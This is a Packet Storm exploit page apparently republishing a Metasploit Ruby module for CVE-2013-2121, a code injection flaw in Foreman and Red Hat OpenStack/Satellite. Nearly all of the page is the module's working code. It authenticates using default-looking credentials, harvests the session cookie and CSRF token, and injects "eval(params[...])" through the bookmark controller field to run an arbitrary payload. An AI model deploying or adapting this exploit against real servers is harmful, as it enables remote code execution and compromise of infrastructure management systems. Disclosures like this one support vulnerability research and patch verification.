what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Foreman (Red Hat OpenStack/Satellite) Code Injection

Foreman (Red Hat OpenStack/Satellite) Code Injection
Posted Jul 23, 2013
Authored by Ramon de C Valle | Site metasploit.com

This Metasploit module exploits a code injection vulnerability in the 'create' action of 'bookmarks' controller of Foreman and Red Hat OpenStack/Satellite (Foreman 1.2.0-RC1 and earlier).

tags | exploit
systems | linux, redhat
advisories | CVE-2013-2121, OSVDB-94671
SHA-256 | c5c9607b201bbed12138b9c01832cadc3f0585df9c929779954f3b1deff22316

Foreman (Red Hat OpenStack/Satellite) Code Injection

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote

include Msf::Exploit::Remote::HttpClient

def initialize
super(
'Name' => 'Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection',
'Description' => %q{
This module exploits a code injection vulnerability in the 'create'
action of 'bookmarks' controller of Foreman and Red Hat OpenStack/Satellite
(Foreman 1.2.0-RC1 and earlier).
},
'Author' => 'Ramon de C Valle',
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-2121'],
['CWE', '95'],
['OSVDB', '94671'],
['BID', '60833'],
['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=968166'],
['URL', 'http://projects.theforeman.org/issues/2631']
],
'Platform' => 'ruby',
'Arch' => ARCH_RUBY,
'Privileged' => false,
'Targets' =>
[
['Automatic', {}]
],
'DisclosureDate' => 'Jun 6 2013',
'DefaultOptions' => { 'PrependFork' => true },
'DefaultTarget' => 0
)

register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('USERNAME', [true, 'Your username', 'admin']),
OptString.new('PASSWORD', [true, 'Your password', 'changeme']),
OptString.new('TARGETURI', [ true, 'The path to the application', '/']),
], self.class
)
end

def exploit
print_status("Logging into #{target_url}...")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'users', 'login'),
'vars_post' => {
'login[login]' => datastore['USERNAME'],
'login[password]' => datastore['PASSWORD']
}
)

fail_with(Exploit::Failure::Unknown, 'No response from remote host') if res.nil?

if res.headers['Location'] =~ /users\/login$/
fail_with(Exploit::Failure::NoAccess, 'Authentication failed')
else
session = $1 if res.headers['Set-Cookie'] =~ /_session_id=([0-9a-f]*)/
fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the current session id') if session.nil?
end

print_status('Retrieving the CSRF token for this session...')
res = send_request_cgi(
'cookie' => "_session_id=#{session}",
'method' => 'GET',
'uri' => normalize_uri(target_uri)
)

fail_with(Exploit::Failure::Unknown, 'No response from remote host') if res.nil?

if res.headers['Location'] =~ /users\/login$/
fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the CSRF token')
else
csrf_param = $1 if res.body =~ /<meta[ ]+content="(.*)"[ ]+name="csrf-param"[ ]*\/?>/i
csrf_token = $1 if res.body =~ /<meta[ ]+content="(.*)"[ ]+name="csrf-token"[ ]*\/?>/i

if csrf_param.nil? || csrf_token.nil?
csrf_param = $1 if res.body =~ /<meta[ ]+name="csrf-param"[ ]+content="(.*)"[ ]*\/?>/i
csrf_token = $1 if res.body =~ /<meta[ ]+name="csrf-token"[ ]+content="(.*)"[ ]*\/?>/i
end

fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the CSRF token') if csrf_param.nil? || csrf_token.nil?
end

payload_param = Rex::Text.rand_text_alpha_lower(rand(9) + 3)

print_status("Sending create-bookmark request to #{target_url('bookmarks')}...")
res = send_request_cgi(
'cookie' => "_session_id=#{session}",
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'bookmarks'),
'vars_post' => {
csrf_param => csrf_token,
payload_param => payload.encoded,
'bookmark[controller]' => "eval(params[:#{payload_param}])#",
'bookmark[name]' => Rex::Text.rand_text_alpha_lower(rand(9) + 3),
'bookmark[query]' => Rex::Text.rand_text_alpha_lower(rand(9) + 3)
}
)
end

def target_url(*args)
(ssl ? 'https' : 'http') +
if rport.to_i == 80 || rport.to_i == 443
"://#{vhost}"
else
"://#{vhost}:#{rport}"
end + normalize_uri(target_uri.path, *args)
end
end
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close